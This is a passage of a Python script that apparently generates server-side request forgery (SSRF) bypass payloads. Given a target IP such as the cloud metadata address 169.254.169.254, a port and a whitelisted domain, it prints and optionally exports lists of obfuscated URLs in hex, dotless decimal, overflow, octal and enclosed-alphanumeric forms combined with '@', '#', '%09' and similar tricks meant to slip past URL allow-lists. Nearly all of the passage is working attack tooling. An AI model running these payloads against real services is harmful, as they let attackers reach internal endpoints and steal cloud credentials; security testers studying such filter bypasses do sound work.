|
||||||
|
if s0 not in EnclosedAlphanumericsData:
|
||||||
|
raise Exception('value not found')
|
||||||
|
return random.choice(EnclosedAlphanumericsData[s0])
|
||||||
|
|
||||||
|
def convertIP2EnclosedAlphanumericsValue():
|
||||||
|
IPAddressParts4EnclosedAlphanumerics = arg1.split(".")
|
||||||
|
returnEnclosedAlphanumericsIPAddress = ""
|
||||||
|
for x in range(0,4):
|
||||||
|
if len(IPAddressParts4EnclosedAlphanumerics[x]) == 3 and (int(IPAddressParts4EnclosedAlphanumerics[x][0]+IPAddressParts4EnclosedAlphanumerics[x][1])) <= 20 and (int(IPAddressParts4EnclosedAlphanumerics[x][0]+IPAddressParts4EnclosedAlphanumerics[x][1]+IPAddressParts4EnclosedAlphanumerics[x][2])) >= 10:
|
||||||
|
returnEnclosedAlphanumericsIPAddress = returnEnclosedAlphanumericsIPAddress + plain2EnclosedAlphanumericsChar(IPAddressParts4EnclosedAlphanumerics[x][0]+IPAddressParts4EnclosedAlphanumerics[x][1]);
|
||||||
|
returnEnclosedAlphanumericsIPAddress = returnEnclosedAlphanumericsIPAddress + plain2EnclosedAlphanumericsChar(IPAddressParts4EnclosedAlphanumerics[x][2]);
|
||||||
|
if x <= 2:
|
||||||
|
returnEnclosedAlphanumericsIPAddress = returnEnclosedAlphanumericsIPAddress + plain2EnclosedAlphanumericsChar('.');
|
||||||
|
else:
|
||||||
|
returnEnclosedAlphanumericsIPAddress = returnEnclosedAlphanumericsIPAddress + plain2EnclosedAlphanumericsChar(IPAddressParts4EnclosedAlphanumerics[x][0]);
|
||||||
|
if len(IPAddressParts4EnclosedAlphanumerics[x]) >= 2:
|
||||||
|
returnEnclosedAlphanumericsIPAddress = returnEnclosedAlphanumericsIPAddress + plain2EnclosedAlphanumericsChar(IPAddressParts4EnclosedAlphanumerics[x][1]);
|
||||||
|
if len(IPAddressParts4EnclosedAlphanumerics[x]) == 3:
|
||||||
|
returnEnclosedAlphanumericsIPAddress = returnEnclosedAlphanumericsIPAddress + plain2EnclosedAlphanumericsChar(IPAddressParts4EnclosedAlphanumerics[x][2]);
|
||||||
|
if x <= 2:
|
||||||
|
returnEnclosedAlphanumericsIPAddress = returnEnclosedAlphanumericsIPAddress + plain2EnclosedAlphanumericsChar('.');
|
||||||
|
return returnEnclosedAlphanumericsIPAddress
|
||||||
|
|
||||||
|
def convert(s, recurse_chunks=True, error_on_miss=False):
|
||||||
|
if s in EnclosedAlphanumericsData:
|
||||||
|
return random.choice(EnclosedAlphanumericsData[s])
|
||||||
|
if recurse_chunks and len(s) > 1:
|
||||||
|
return convert(s[:-1]) + convert(s[-1])
|
||||||
|
if error_on_miss:
|
||||||
|
raise Exception('Value not found: %s' % s)
|
||||||
|
return s
|
||||||
|
|
||||||
|
def convert_ip(ip, sep='.'):
|
||||||
|
return convert(sep).join([convert(chunk) for chunk in ip.split(sep)])
|
||||||
|
|
||||||
|
if len(sys.argv) < 4 or len(sys.argv) >= 6:
|
||||||
|
print("\nUsage: python "+sys.argv[0]+" IP PORT WhiteListedDomain EXPORT(optional)\nUsage: python "+sys.argv[0]+" 169.254.169.254 80 www.google.com\nUsage: python "+sys.argv[0]+" 169.254.169.254 80 www.google.com export")
|
||||||
|
exit(1)
|
||||||
|
|
||||||
|
redcolor='\x1b[0;31;40m'
|
||||||
|
greencolor='\x1b[0;32;40m'
|
||||||
|
yellowcolor='\x1b[0;33;40m'
|
||||||
|
bluecolor='\x1b[0;36;40m'
|
||||||
|
resetcolor='\x1b[0m'
|
||||||
|
arg1 = str(sys.argv[1])
|
||||||
|
|
||||||
|
if validIP(arg1) == False:
|
||||||
|
print("\n",yellowcolor,arg1,resetcolor,redcolor," is not a valid IPv4 address in dotted decimal format, example: 123.123.123.123",resetcolor,sep='')
|
||||||
|
print("\nUsage: python "+sys.argv[0]+" IP EXPORT(optional)\nUsage: python "+sys.argv[0]+" 169.254.169.254\nUsage: python "+sys.argv[0]+" 169.254.169.254 export")
|
||||||
|
exit(1)
|
||||||
|
|
||||||
|
ipFrag3, ipFrag2, ipFrag1, ipFrag0 = arg1.split(".")
|
||||||
|
PORT=str(sys.argv[2])
|
||||||
|
RANDPREFIXTEXT=RANDOM_TEXT()
|
||||||
|
RANDPREFIXTEXTSPEC=RANDOM_TEXT_SPEC()
|
||||||
|
RANDOMPREFIXVALIDSITE=str(sys.argv[3])
|
||||||
|
FILENAME=''
|
||||||
|
|
||||||
|
try:
|
||||||
|
sys.argv[4]
|
||||||
|
except IndexError:
|
||||||
|
EXPORTRESULTS=''
|
||||||
|
else:
|
||||||
|
EXPORTRESULTS=str(sys.argv[4])
|
||||||
|
|
||||||
|
if EXPORTRESULTS == 'export':
|
||||||
|
FILENAME = "export-" + arg1 + "-" + str(datetime.datetime.now().strftime("%H-%M-%d-%m-%Y"))+'.txt'
|
||||||
|
pythonversion = (platform.python_version())
|
||||||
|
major, minor, patchlevel = pythonversion.split(".")
|
||||||
|
if major == "3":
|
||||||
|
f = open(FILENAME, 'w')
|
||||||
|
else:
|
||||||
|
f = open(FILENAME, 'wb')
|
||||||
|
elif EXPORTRESULTS != '':
|
||||||
|
print("\nUsage: python "+sys.argv[0]+" IP WhiteListedDomain EXPORT(optional)\nUsage: python "+sys.argv[0]+" 169.254.169.254 80 www.google.com\nUsage: python "+sys.argv[0]+" 169.254.169.254 80 www.google.com export")
|
||||||
|
exit(1)
|
||||||
|
|
||||||
|
#Case 1 - Dotted hexadecimal
|
||||||
|
print("\n",sep='')
|
||||||
|
print(bluecolor,"Dotted hexadecimal IP Address of:",resetcolor,yellowcolor," http://",arg1,resetcolor,bluecolor," + authentication prefix/bypass combo list",resetcolor,sep='')
|
||||||
|
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
|
||||||
|
IP1 = HEX_SINGLE(ipFrag3,"yes") + "." + HEX_SINGLE(ipFrag2,"yes") + "." + HEX_SINGLE(ipFrag1,"yes") + "." + HEX_SINGLE(ipFrag0,"yes")
|
||||||
|
print('http://',IP1,':',PORT,'/',sep='')
|
||||||
|
print('http://',IP1,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/','/',sep='')
|
||||||
|
print('http://',IP1,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'@',IP1,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP1,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP1,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP1,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP1,':','@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP1,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP1,':','+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP1,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP1,':',PORT,'/',sep='')
|
||||||
|
print('http://',IP1,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP1,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP1,':',PORT,'/',sep='')
|
||||||
|
print('http://',IP1,':',PORT,':80','/',sep='')
|
||||||
|
print('http://',IP1,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',IP1,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',IP1,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
|
||||||
|
print("\n",sep='')
|
||||||
|
if EXPORTRESULTS == 'export':
|
||||||
|
print('http://',IP1,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',IP1,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',IP1,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'@',IP1,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP1,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP1,':',PORT,'/',file=f,sep='')
|
||||||
|
#===========================================================================
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP1,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP1,':','@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP1,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP1,':','+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP1,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP1,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',IP1,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP1,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP1,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',IP1,':',PORT,':80','/',file=f,sep='')
|
||||||
|
print('http://',IP1,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',IP1,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',IP1,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
#===========================================================================
|
||||||
|
|
||||||
|
#Case 2 - Dotless hexadecimal
|
||||||
|
print(bluecolor,"Dotless hexadecimal IP Address of:",resetcolor,yellowcolor," http://",arg1,resetcolor,bluecolor," + authentication prefix/bypass combo list",resetcolor,sep='')
|
||||||
|
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
|
||||||
|
IP2 = HEX_SINGLE(ipFrag3,"yes") + HEX_SINGLE(ipFrag2,"no") + HEX_SINGLE(ipFrag1,"no") + HEX_SINGLE(ipFrag0,"no")
|
||||||
|
print('http://',IP2,':',PORT,'/',sep='')
|
||||||
|
print('http://',IP2,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',IP2,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'@',IP2,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP2,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP2,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP2,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP2,':','@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP2,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP2,':','+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP2,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP2,':',PORT,'/',sep='')
|
||||||
|
print('http://',IP2,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP2,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP2,':',PORT,'/',sep='')
|
||||||
|
print('http://',IP2,':',PORT,':80','/',sep='')
|
||||||
|
print('http://',IP2,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',IP2,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',IP2,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
|
||||||
|
print("\n",sep='')
|
||||||
|
if EXPORTRESULTS == 'export':
|
||||||
|
print('http://',IP2,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',IP2,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',IP2,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'@',IP2,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP2,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP2,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP2,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP2,':','@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP2,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP2,':','+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP2,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP2,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',IP2,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP2,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP2,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',IP2,':',PORT,':80','/',file=f,sep='')
|
||||||
|
print('http://',IP2,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',IP2,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',IP2,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
|
||||||
|
#Case 3 - Dotless decimal
|
||||||
|
print(bluecolor,"Dotless decimal IP Address of:",resetcolor,yellowcolor," http://",arg1,resetcolor,bluecolor," + authentication prefix/bypass combo list",resetcolor,sep='')
|
||||||
|
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
|
||||||
|
IP3 = str(DECIMAL_SINGLE(ipFrag3,3) + DECIMAL_SINGLE(ipFrag2,2) + DECIMAL_SINGLE(ipFrag1,1) + DECIMAL_SINGLE(ipFrag0,0))
|
||||||
|
print('http://',IP3,':',PORT,'/',sep='')
|
||||||
|
print('http://',IP3,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',IP3,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'@',IP3,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP3,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP3,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP3,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP3,':','@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP3,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP3,':','+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP3,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP3,':',PORT,'/',sep='')
|
||||||
|
print('http://',IP3,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP3,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP3,':',PORT,'/',sep='')
|
||||||
|
print('http://',IP3,':',PORT,':80','/',sep='')
|
||||||
|
print('http://',IP3,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',IP3,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',IP3,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
|
||||||
|
print("\n",sep='')
|
||||||
|
if EXPORTRESULTS == 'export':
|
||||||
|
print('http://',IP3,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',IP3,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',IP3,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'@',IP3,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP3,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP3,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP3,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP3,':','@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP3,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP3,':','+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP3,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP3,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',IP3,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP3,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP3,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',IP3,':',PORT,':80','/',file=f,sep='')
|
||||||
|
print('http://',IP3,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',IP3,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',IP3,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
|
||||||
|
#Case 4 - Dotted decimal with overflow(256)
|
||||||
|
print(bluecolor,"Dotted decimal with overflow(256) IP Address of:",resetcolor,yellowcolor," http://",arg1,resetcolor,bluecolor," + authentication prefix/bypass combo list",resetcolor,sep='')
|
||||||
|
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
|
||||||
|
IP4 = DEC_OVERFLOW_SINGLE(ipFrag3) + "." + DEC_OVERFLOW_SINGLE(ipFrag2) + "." + DEC_OVERFLOW_SINGLE(ipFrag1) + "." + DEC_OVERFLOW_SINGLE(ipFrag0)
|
||||||
|
print('http://',IP4,':',PORT,'/',sep='')
|
||||||
|
print('http://',IP4,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',IP4,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'@',IP4,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP4,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP4,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP4,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP4,':','@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP4,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP4,':','+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP4,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP4,':',PORT,'/',sep='')
|
||||||
|
print('http://',IP4,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP4,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP4,':',PORT,'/',sep='')
|
||||||
|
print('http://',IP4,':',PORT,':80','/',sep='')
|
||||||
|
print('http://',IP4,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',IP4,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',IP4,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
|
||||||
|
print("\n",sep='')
|
||||||
|
if EXPORTRESULTS == 'export':
|
||||||
|
print('http://',IP4,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',IP4,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',IP4,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'@',IP4,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP4,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP4,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP4,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP4,':','@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP4,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP4,':','+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP4,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP4,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',IP4,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP4,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP4,':',PORT,'/',file=f,sep='')
|
||||||
|
print('http://',IP4,':',PORT,':80','/',file=f,sep='')
|
||||||
|
print('http://',IP4,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',IP4,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
print('http://',IP4,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
|
||||||
|
|
||||||
|
#Case 5 - Dotted octal
|
||||||
|
print(bluecolor,"Dotted octal IP Address of:",resetcolor,yellowcolor," http://",arg1,resetcolor,bluecolor," + authentication prefix/bypass combo list",resetcolor,sep='')
|
||||||
|
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
|
||||||
|
IP5 = OCT_SINGLE(ipFrag3) + "." + OCT_SINGLE(ipFrag2) + "." + OCT_SINGLE(ipFrag1) + "." + OCT_SINGLE(ipFrag0)
|
||||||
|
print('http://',IP5,':',PORT,'/',sep='')
|
||||||
|
print('http://',IP5,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',IP5,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'@',IP5,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP5,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP5,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP5,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP5,':','@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',IP5,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',IP5,':','+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP5,':',PORT,'/',sep='')
|
||||||
|
print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP5,':',PORT,'/',sep='')
|
||||||
|
print('http://',IP5,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP5,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP5,':',PORT,'/',sep='')
|
||||||
|
print('http://',IP5,':',PORT,':80','/',sep='')
|
||||||
|
print('http://',IP5,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',IP5,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print('http://',IP5,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',sep='')
|
||||||
|
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
|
||||||
|
print("\n",sep='')
|
||||||
|
if EXPORTRESULTS == 'export':
|
||||||
|
print('http://',IP5,':',PORT,'/',file=f,sep='')
|
||||||
|
